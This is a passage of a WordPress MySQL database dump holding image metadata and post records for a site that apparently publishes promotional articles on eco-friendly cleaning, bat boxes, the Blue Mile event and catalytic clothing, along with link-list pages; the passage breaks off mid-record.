a:4:{s:4:\"file\";s:38:\"team-spirit-2447163_960_720-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(572,193,'_thumbnail_id','195'),(573,198,'_menu_item_type','post_type'),(574,198,'_menu_item_menu_item_parent','172'),(575,198,'_menu_item_object_id','193'),(576,198,'_menu_item_object','page'),(577,198,'_menu_item_target',''),(578,198,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(579,198,'_menu_item_xfn',''),(580,198,'_menu_item_url',''),(581,201,'_wp_attached_file','2019/05/party-hire-perth.jpg'),(582,201,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:28:\"2019/05/party-hire-perth.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"party-hire-perth-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"party-hire-perth-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"party-hire-perth-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:28:\"party-hire-perth-960x450.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:28:\"party-hire-perth-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:28:\"party-hire-perth-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:28:\"party-hire-perth-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:27:\"party-hire-perth-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"10\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"Canon EOS 60D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:2:\"15\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(583,201,'_wp_attachment_image_alt','party-hire-perth'),(584,200,'_edit_last','1'),(585,200,'_edit_lock','1559315946:1'),(586,200,'_thumbnail_id','201'),(587,200,'_adinserter_block_exceptions',''),(588,200,'_hitmag_layout_meta','th-default-layout'),(589,200,'wpmdr_menu','1'),(600,213,'_edit_last','1'),(601,213,'_edit_lock','1629806179:1'),(602,214,'_wp_attached_file','2021/08/Rehabilitation.jpg'),(603,214,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1373;s:4:\"file\";s:26:\"2021/08/Rehabilitation.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Rehabilitation-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Rehabilitation-1024x732.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:732;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Rehabilitation-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Rehabilitation-768x549.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:549;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:28:\"Rehabilitation-1536x1098.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1098;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:27:\"Rehabilitation-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:26:\"Rehabilitation-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:26:\"Rehabilitation-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:26:\"Rehabilitation-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:25:\"Rehabilitation-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(604,213,'_thumbnail_id','214'),(606,213,'_hitmag_layout_meta','th-default-layout'),(614,213,'_encloseme','1');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_posts`
--

DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=224 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_posts`
--

LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (6,1,'2017-08-22 07:53:49','2017-08-22 07:53:49','','Personal Services','','publish','closed','closed','','personal-servicesindex-html','','','2017-08-22 07:55:26','2017-08-22 07:55:26','',0,'http://www.dailyjolly.co.uk/?page_id=6',0,'page','',0),(7,1,'2017-08-22 07:53:49','2017-08-22 07:53:49','','/personal-services/index.html','','inherit','closed','closed','','6-revision-v1','','','2017-08-22 07:53:49','2017-08-22 07:53:49','',6,'http://www.dailyjolly.co.uk/6-revision-v1',0,'revision','',0),(8,1,'2017-08-22 07:54:01','2017-08-22 07:54:01','','Mature Web Cams','','publish','closed','closed','','adult-web-camsmature-web-cams-htm','','','2017-08-22 07:55:09','2017-08-22 07:55:09','',0,'http://www.dailyjolly.co.uk/?page_id=8',0,'page','',0),(9,1,'2017-08-22 07:54:01','2017-08-22 07:54:01','','/adult-web-cams/mature-web-cams.htm','','inherit','closed','closed','','8-revision-v1','','','2017-08-22 07:54:01','2017-08-22 07:54:01','',8,'http://www.dailyjolly.co.uk/8-revision-v1',0,'revision','',0),(10,1,'2017-08-22 07:54:14','2017-08-22 07:54:14','','Phone Conversations','','publish','closed','closed','','mature-phone-sex-htm','','','2017-08-22 07:55:17','2017-08-22 07:55:17','',0,'http://www.dailyjolly.co.uk/?page_id=10',0,'page','',0),(11,1,'2017-08-22 07:54:14','2017-08-22 07:54:14','','/mature-phone-sex.htm','','inherit','closed','closed','','10-revision-v1','','','2017-08-22 07:54:14','2017-08-22 07:54:14','',10,'http://www.dailyjolly.co.uk/10-revision-v1',0,'revision','',0),(12,1,'2017-08-22 07:54:27','2017-08-22 07:54:27','','Adult Web Cams','','publish','closed','closed','','adult-web-camslesbian-webcams-htm','','','2017-08-22 07:55:02','2017-08-22 07:55:02','',0,'http://www.dailyjolly.co.uk/?page_id=12',0,'page','',0),(13,1,'2017-08-22 07:54:27','2017-08-22 07:54:27','','/adult-web-cams/lesbian-webcams.htm','','inherit','closed','closed','','12-revision-v1','','','2017-08-22 07:54:27','2017-08-22 07:54:27','',12,'http://www.dailyjolly.co.uk/12-revision-v1',0,'revision','',0),(14,1,'2017-08-22 07:54:35','2017-08-22 07:54:35','','Home','','publish','closed','closed','','index-html','','','2017-08-22 07:54:43','2017-08-22 07:54:43','',0,'http://www.dailyjolly.co.uk/?page_id=14',0,'page','',0),(15,1,'2017-08-22 07:54:35','2017-08-22 07:54:35','','/index.html','','inherit','closed','closed','','14-revision-v1','','','2017-08-22 07:54:35','2017-08-22 07:54:35','',14,'http://www.dailyjolly.co.uk/14-revision-v1',0,'revision','',0),(16,1,'2017-08-22 07:54:43','2017-08-22 07:54:43','','Home','','inherit','closed','closed','','14-revision-v1','','','2017-08-22 07:54:43','2017-08-22 07:54:43','',14,'http://www.dailyjolly.co.uk/14-revision-v1',0,'revision','',0),(17,1,'2017-08-22 07:55:02','2017-08-22 07:55:02','','Adult Web Cams','','inherit','closed','closed','','12-revision-v1','','','2017-08-22 07:55:02','2017-08-22 07:55:02','',12,'http://www.dailyjolly.co.uk/12-revision-v1',0,'revision','',0),(18,1,'2017-08-22 07:55:09','2017-08-22 07:55:09','','Mature Web Cams','','inherit','closed','closed','','8-revision-v1','','','2017-08-22 07:55:09','2017-08-22 07:55:09','',8,'http://www.dailyjolly.co.uk/8-revision-v1',0,'revision','',0),(19,1,'2017-08-22 07:55:17','2017-08-22 07:55:17','','Phone Conversations','','inherit','closed','closed','','10-revision-v1','','','2017-08-22 07:55:17','2017-08-22 07:55:17','',10,'http://www.dailyjolly.co.uk/10-revision-v1',0,'revision','',0),(20,1,'2017-08-22 07:55:26','2017-08-22 07:55:26','','Personal Services','','inherit','closed','closed','','6-revision-v1','','','2017-08-22 07:55:26','2017-08-22 07:55:26','',6,'http://www.dailyjolly.co.uk/6-revision-v1',0,'revision','',0),(24,1,'2017-10-06 08:45:04','2017-10-06 08:45:04','We have recommended some of the best news websites online which all cover a range of topics. See below if you want to check them out.\r\n<table width=\"190\">\r\n<tbody>\r\n<tr>\r\n<td width=\"190\"><a href=\"http://argus-btn.co.uk/\">argus-btn</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://kingsfieldpublications.co.uk/\">kingsfieldpublications</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://iraqcrisis.co.uk/\">iraqcrisis</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://adauk.org.uk/\">adauk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://oat.org.uk/\">oat</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://liveattheinstitute.co.uk/\">liveattheinstitute</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://gocscotland.org.uk/\">gocscotland</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://westlothiannews.co.uk/\">westlothiannews</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://wimps.org.uk/\">wimps</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://yuonline.co.uk/\">yuonline</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://wikiville.org.uk/\">wikiville</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://headlines-today.co.uk/\">headlines-today</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://myentertainmentnews.co.uk/\">myentertainmentnews</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://injournalism.co.uk/\">injournalism</a></td>\r\n</tr>\r\n</tbody>\r\n</table>','Can you Find it - Business Links!','The Can you Find it - Business is a monthly Business to Business publication published by the Headline History. Every month in excess of 16,000 copies are sent out by direct mail and picked up through our network of county wide distribution points. Including 120 training agencies, 80 councillors, Whitehall and Brussels. The Can you Find it - Business is distributed throughout London, Sussex, North and Central Lancs and all companies in this area. We offer businesses a number of different opportunities to take full advantage of the marketing potential within the Can you find it - Business Edition.','publish','closed','closed','','can-you-find-it-business-links','','','2017-10-17 09:08:05','2017-10-17 09:08:05','',0,'http://www.dailyjolly.co.uk/can-you-find-it-business-2017',0,'page','',0),(27,1,'2017-10-17 08:31:30','2017-10-17 08:31:30','<h2 class=\"title\">A savvy idea for bats <i>or</i> birds</h2>\r\nWhen a group of students and DofE participants at Savio Salesian College in Bootle, Merseyside spent a lesson studying bats, they decided they\'d like to use their woodworking time making bat boxes. The year above, however, wanted to give bird boxes a go. Luckily, their inventive teacher asked them to come up with a design that could work as both, and the Savy BOB box was born.\r\n\r\nThe BOB box works by having two separate entrances; one on the front for birds, and one underneath for bats. The bat entrance can be closed off to allow for birds nesting at the front.\r\n\r\nStudents make their BOB boxes by hand during lunch breaks and after school and in just 2 years they\'ve made over 1,000. So far the project has proven a great success. When Knowsley Safari Park heard about these innovative multi-purpose roosts, they placed an order for BOB boxes in their woodland walk. Pupils can even count members of the royal family as fans.\r\n\r\nThe effort they\'ve put it has surprised many, including their teacher, Steve Burrowes. \"This has been like a springboard for them\" he says. \"I don\'t think I realised the impact it would have; my classroom is a better classroom for it, and our school is a better school for it\".\r\n\r\nIn the school\'s garden, pupils are already enjoying the sight of common finches and blue tits as they make use of their handmade, homemade habitats. As well as winning a prestigious <a href=\"../../friends/observer-ethical-awards/\">Observer Ethical Award</a>, the BOB box has been given recognition and approval by the Bat Conservation Trust (BCT) who is now helping to fund production.\r\n\r\nIt\'s not only birds and bats that benefit; the project has given pupils a real sense of focus and pride. \"It\'s been running for two years now and we\'ve really enjoyed learning about the bats and the birds and making these BOB boxes\" says pupil Dominic Cavanagh.\r\n\r\nThe next step for Savio Salesian pupils is to begin selling BOB boxes online. But until then, you can get your hands on one of 13 by entering our competition to <a href=\"../../offers-and-competitions/bob-box-competition/\">win a BOB box</a>.','Bat or Bird box','','publish','open','open','','bat-or-bird-box','','','2017-10-17 08:34:47','2017-10-17 08:34:47','',0,'http://www.dailyjolly.co.uk/bat-or-bird-box',0,'post','',0),(28,1,'2017-10-17 08:31:34','2017-10-17 08:31:34','<h1>Bee Clever has landed at the Eden Project</h1>\r\n<strong>Bee Clever has been enjoying a fantastic summer, from buzzing out to the rocking tunes at Glasto to the Inspire Zone at <a href=\"../../feel-good/ecover-garden/\">RHS Hampton Court Flower show</a>.</strong>\r\n\r\nNow <strong>Bee Clever</strong> can be enjoyed all year round at Eden, a fitting home full of similar marvellous recycled creations, creatures and beautiful gardens to pollinate.\r\n\r\nIf you\'re visiting, head over to <strong>\'The Hive in the Orchard\'</strong> at the centre of the site, where you can say hello to the giant bee before picking up information needed to start you on your journey through <strong>Eden</strong>.\r\n\r\n<strong>Daily</strong> and <strong>Eden</strong> will be working together to show that with some <strong><a href=\"../../message-in-our-bottle/green-cleaning-innovation-infographic/\">clever science</a></strong> you can really learn from nature, from biome and honeycomb structures to nature\'s chemistry. The sculpture will form part of a new pollination project seeking to raise awareness in <strong><a href=\"../../feel-good/help-support-our-bees/\">helping support our bees</a></strong>.\r\n\r\n&nbsp;\r\n\r\n<strong>Daily</strong> is keen to show our support for our friends at Eden Project, an environmental charity, transforming social and environmental projects around the world. In addition to being a leading UK attraction it also develops students, doing valuable research into plant conservation.\r\n\r\nRead <strong><a href=\"http://www.edenproject.com/blog/index.php/2013/07/meet-the-recycled-bee-sculture-who-has-just-landed-at-eden/\" target=\"_blank\" rel=\"noopener\">Eden\'s Blog</a></strong> and visit <strong><a href=\"http://www.edenproject.com/\" target=\"_blank\" rel=\"noopener\">www.edenproject.com</a></strong> to find out about how you can make the most of your trip.','What\'s new at the Eden Project?','Bee Clever has been enjoying a fantastic summer, from buzzing out to the rocking tunes at Glasto to the Inspire Zone at RHS Hampton Court Flower show.','publish','open','open','','bee-clever-lands-at-the-eden-project','','','2017-10-17 08:37:34','2017-10-17 08:37:34','',0,'http://www.dailyjolly.co.uk/bee-clever-lands-at-the-eden-project',0,'post','',0),(29,1,'2017-10-17 08:31:37','2017-10-17 08:31:37','<h1>Biological Detergents: Busting the Enzyme Myth</h1>\r\n<strong>Hands up if you think that enzymes are a <a href=\"../../articles/no-nasties/\">nasty</a>?</strong>\r\n\r\nIf you\'re hand is up - nil point. We are here to bust a few myths that have been floating around and show you why we think enzymes are another example of what makes nature brilliant.\r\n\r\nEnzymes are everywhere from your belly to our biological detergents, because when it comes to breaking down proteins they reign supreme. Acting as a catalyst in laundry detergents, our enzymes roll up their biological sleeves and wrestle tough protein based stains from your clothes.\r\n\r\nAs the powerhouses of the biological cleaning, you\'ll find enzyme formulations across our range including <a href=\"http://www.ecoverdirect.com/products/ecover-bio-laundry-gel-18-washes/egelbiogreen18.aspx?productid=egelbiogreen18\" target=\"_blank\" rel=\"noopener\">Daily Bio Gel</a>, <a href=\"http://www.ecoverdirect.com/products/bio-concentrated-washing-powder/ebiopowd750.aspx?productid=ebiopowd750\" target=\"_blank\" rel=\"noopener\">Powder</a>, and <a href=\"http://www.ecoverdirect.com/search.aspx?q=bio%20liquid\" target=\"_blank\" rel=\"noopener\">Liquid</a> but without those chemical nasties.\r\n\r\nSo next time you put the washing on, sit down and relax with a cuppa, safe in the knowledge that the grass stained school uniforms will come out shining bright and stain free after using the Daily Biological range.\r\n\r\n<strong>Put it to the test for yourself, we\'ve five <a href=\"../../offers-and-competitions/bio-bundle/\">Daily Bio Bundles</a> to giveaway...</strong>','Biological cleaning and the enzyme myth: what is the truth?','Hands up if you think that enzymes are a nasty? If you\'re hand is up - nil point. We are here to bust a few myths that have been floating around.','publish','open','open','','biological-cleaning-and-the-enzyme-myth','','','2017-10-17 08:36:55','2017-10-17 08:36:55','',0,'http://www.dailyjolly.co.uk/biological-cleaning-and-the-enzyme-myth',0,'post','',0),(30,1,'2017-10-17 08:31:40','2017-10-17 08:31:40','<h2 class=\"title\">New recruit in serious training for the Blue Mile</h2>\r\nDaily UK\'s new Brand Assistant John is more than a team player – he\'s our team swimmer! He\'s been taking his training for the <a href=\"../../articles/blue-mile/\">Daily Blue Mile</a> challenge very seriously, getting up bright and early to train at the Tri20 Swimming Centre open lake in Reading. While stopping for a glug of water earlier this morning he was heard to gasp, \"Michael Phelps doesn\'t have a patch on me!\"\r\n\r\nLee will be taking the plunge in the swimming leg of the Corporate Race, which takes place at Plymouth waterfront on 8th and 9th September, and is looking to beat Trade Marketing Manager Simon Reberga\'s effort last year of around 34 minutes. Simon will be taking on the challenge of the kayak section this time instead.\r\n<div class=\"highlight2\">\r\n\r\n\"Michael Phelps doesn\'t have a patch on me!\"\r\n\r\n</div>\r\nThe Blue Mile is one of a whole host of water themed activities featured as part of the Plymouth Marine City Festival. The Daily stall will be handing out free goody bags and there\'ll be plenty of other exciting exhibitors to browse around too. There will be live music to entertain the crowds and hopefully spur on our team to some record-breaking times. Delicious sustainable cuisine will be available at the Boat House Café for hungry swimmers, paddlers, kayakers, walkers and spectators. And if that wasn\'t enough to tempt you to join the fun, there will be a giant sea creature parade happening on the Saturday. Not to be missed!\r\n\r\nWe wish everyone taking part a fun-packed day. Keep up the training everyone, including Lee. Remember, Positive Mental Attitude can take you a long way…\r\n\r\nYou too can take part in The Daily Blue Mile, whether you prefer to swim, kayak, walk or even stand-up paddle board. To find out more visit <a href=\"http://www.thebluemile.org/\" target=\"_blank\" rel=\"noopener\">www.thebluemile.org</a>\r\n\r\nAlready in training? Let us know how you\'re getting on using <strong>#DailyBlueMile</strong>\r\n\r\nSee you there!','Are you training for the Blue Mile? Check out our tips','Our new Brand Assistant is training for this year\'s Blue Mile event. You can join in - sign-up to swim, walk or paddle for a mile and raise money for WWF.','publish','open','open','','are-you-training-for-the-blue-mile-check-out-our-tips','','','2017-10-17 08:36:03','2017-10-17 08:36:03','',0,'http://www.dailyjolly.co.uk/training-for-the-blue-mile-the-splash',0,'post','',0),(31,1,'2017-10-17 08:31:50','2017-10-17 08:31:50','<h2 class=\"title\">Move an Daily Blue Mile</h2>\r\nIt\'s a sad truth that the world\'s rivers, oceans, lakes and wetlands are under threat. Factors such as climate change and pollution are affecting water quality, along with the delicate ecological systems that many plants, fish and aquatic species rely on to survive.\r\n\r\nTo raise awareness of the importance of our rivers and seas we\'re sponsoring <a href=\"http://www.thebluemile.org/\" target=\"_blank\" rel=\"nofollow noopener\">Blue Mile</a> with the monies raised going to the Marine Conservation Society. The Daily Blue Mile needs people like you to move just 1 mile either on or around water. Whether you prefer a leisurely lake swim or an enlivening coastal walk, you could really help the world to appreciate the true value of our water sources. And with so many beautiful lakes, rivers and coastlines to choose from here in the UK, it\'s the perfect excuse to get out and make the most of them!\r\n\r\nRegistration is now live for the flagship event in Plymouth with further events around the country (including one in Weymouth in July) - <a href=\"http://www.thebluemile.org/\" target=\"_blank\" rel=\"nofollow noopener\">find out more</a>\r\n\r\nCheck out this video of the 2018 event!','What you need to know about the Blue Mile','We are sponsoring this year\'s Blue Mile events. Swim, walk or paddle for a mile and raise money for WWF, helping their efforts to protect rivers and wetlands.','publish','open','open','','what-you-need-to-know-about-the-blue-mile','','','2017-10-17 08:35:14','2017-10-17 08:35:14','',0,'http://www.dailyjolly.co.uk/ecover-blue-mile',0,'post','',0),(32,1,'2017-10-17 08:30:54','2017-10-17 08:30:54','<h2 class=\"title\">Catalytic Clothing: Style with Substance</h2>\r\nIt\'s well known that, at Daily, we care about the environment, and that our cleaning products are designed to have minimum impact on the earth\'s water supplies. But not everyone knows just how much work we put into supporting the pioneering world of environmental science, and the technology and ideas that can make a difference.\r\n\r\nYou see, it\'s not just \'improving water quality\' that\'s at the top of the Daily to-do list. What happens above sea level is just as important to us as what happens below it, so we\'re delighted to be involved in a fantastic new project that focuses on clean air.\r\n<div class=\"highlight\">\r\n\r\nWinners of the 2018 Conde Nast Innovation &amp; Design Awards for \"Sustainability\"\r\nThank you for voting!\r\n\r\n</div>\r\nOf all environmental factors, air pollution has the biggest impact on our health, and it\'s responsible for the majority of environment-related diseases. Each year in the EU, 348,000 premature deaths are attributed to air pollution. With traffic cited as the major cause, the quality of our air is steadily getting worse. When you consider that, throughout an average person\'s life, they\'ll take over 672,768,000 breaths, it becomes clear just how important this issue is.\r\n\r\nWe\'ve been assisting some of the brightest minds to develop a solution; <a href=\"http://www.catalytic-clothing.org/home.html\" target=\"_blank\" rel=\"nofollow noopener\">Catalytic Clothing</a>. It\'s an idea so brilliant we think everyone should know.\r\n\r\nCatalytic Clothing, the brainchild of artist/designer Professor Helen Storey and scientist Professor Tony Ryan, is a pioneering new project that seeks to discover how we could harness the surface of our clothing to purify the air we breathe. By combining the worlds of fashion and chemistry, Helen and Tony have found a way to create style with real substance.\r\n\r\nHere\'s how it works...\r\n\r\nA \'photocatalyst\' is a rather clever chemical which, when exposed to sunlight, breaks down the pollutants in the air. By adding a photocatalyst to fabrics like denim, then turning these fabrics into wearable garments such as jeans, Catalytic Clothing gives you the capacity to neutralise pollution as you go about your daily life. It\'s like carrying your very own catalytic converter in your pocket – except that catalytic converter is your pocket.\r\n\r\nWhile photocatalysts are sometimes added to paint and plastics in buildings, their effect is only felt within 1m of the treated surface. However, when photocatalysts are added to clothing they become mobile, which means they can do their job across a much wider area. For example, if 40 people crossed a 1m stretch of pavement, in just 1 minute they\'d purify 2m2 of air.\r\n\r\nWherever you go, your clothing goes. And wherever your Catalytic Clothing goes, it cleans the air. Amazing!\r\n\r\nIt\'s still early days, and there\'s a lot of work to be done before Catalytic Clothing is ready for the market place. Right now, our aim is to raise awareness. Together with Helen and Tony, we\'re telling everyone who\'ll listen about this groundbreaking development in environmental science. Thanks to a <a href=\"http://www.catalytic-clothing.org/\" target=\"_blank\" rel=\"nofollow noopener\">short video preview</a>, some of the top fashion and science blogs have already started to spread the word about Catalytic Clothing.\r\n\r\nSo if you agree that air-purifying jeans are a work of genius, tell your friends. Put it on your blog, \'like\' the <a href=\"http://www.facebook.com/pages/Catalytic-Clothing-Clothes-that-purify-air/203320786366452\" target=\"_blank\" rel=\"nofollow noopener\">Catalytic Clothing Facebook page</a> and keep an eye on the fashion press... but just remember, you heard it here first.\r\n\r\n<strong>Professor Tony Ryan (OBE)</strong>\r\n<i>Pro-Vice Chancellor - Pure Sciences (University of Sheffield)</i>\r\n<strong>Professor Helen Storey (MBE)</strong>\r\n<i>Professor of Fashion and Science (London College of Fashion)</i>','Catalytic Clothing - Style with Substance','','publish','open','open','','catalytic-clothing-style-with-substance','','','2017-10-17 08:38:00','2017-10-17 08:38:00','',0,'http://www.dailyjolly.co.uk/catalytic-clothing-style-with-substance',0,'post','',0),(33,1,'2017-10-17 08:30:54','2017-10-17 08:30:54','<h1>What should you be thinking about when cleaning the toilet?</h1>\r\n<strong>Did you know Daily Toilet Cleaner is 10 times less toxic than many of the leading brands?</strong>\r\n\r\n<strong>But what does that actually mean you ask?</strong>\r\n\r\nThese ingredients are carefully selected against very strict criteria and one area that we take seriously is the \'aquatic toxicity\' of cleaning products, because we believe water is life. <a href=\"http://devoncornwallproperty.co.uk/cleaning-and-stain-removal-tips/cleaning-and-stain-removal-tips.html\" target=\"_blank\" rel=\"noopener\">Click here</a> for cleaning tips.\r\n\r\nNow here\'s the geeky bit - aquatic toxicity is measured by Critical Dilution Volume or CDV as we call it. CDV measures how much water it takes to neutralise each dose of a product.\r\n\r\nThe lower the \'CDV\', means the lower the aquatic toxicity, which results in a healthier environment for all of the fishes. All of that, plus a fresh and clean toilet, now that really is Feel Good Cleaning. <a href=\"http://peaawards.co.uk/celebrate-a-green-living\" target=\"_blank\" rel=\"noopener\">Find out about green products</a>.\r\n<h2>Wonder if any other leading brands measure their CDV?</h2>\r\nWe can always get better though and it has always been our mission to be at the cutting edge of sustainability, which means even lower CDV.   <a href=\"http://www.dailyjolly.co.uk/green-production-values\">Check out our green production values</a>.\r\n\r\nIf you think that was an eye opener, have you seen our <a href=\"http://www.dailyjolly.co.uk/our-ecological-factory\">ecological factories</a>?\r\n<h2>Office cleaning suited to your working hours</h2>\r\nOffice cleaning agencies will also use the best products to stick with being environmentally friendly, as well as ensuring the best for their clients. When looking for a <a href=\"https://www.outofhour.co.uk/\">commercial cleaning service</a> best suited to your needs, including office hours and services, it is recommend that you ask these questions so you know what your agency can offer you.\r\n\r\nOffice cleaners and <a href=\"https://www.springscleaning.net/\">commercial janitorial services</a> should be professional, uniformed and trained to meet health and safety regulations as well as cleaning standards.\r\n\r\n<strong>If you\'re based in the Sussex area, such as Brighton, Hove and Worthing get in touch with Smart Clean at <a href=\"mailto:admin@smartcleanservices.co.uk\">admin@smartcleanservices.co.uk</a>. </strong>\r\n\r\nThe team at Smart Clean ensure that all staff completes work to the highest standard and within regulations. With over 30 years of experience in the industry, you are sure to have a service that leaves your office looking brand new. <a href=\"http://www.smartcleanservices.co.uk/cleaners.htm\" target=\"_blank\" rel=\"noopener\">Meet the team here</a>.','What should you be thinking about when cleaning the toilet?','Did you know  Toilet Cleaner is 10 times less toxic than many of the leading brands? But what does that 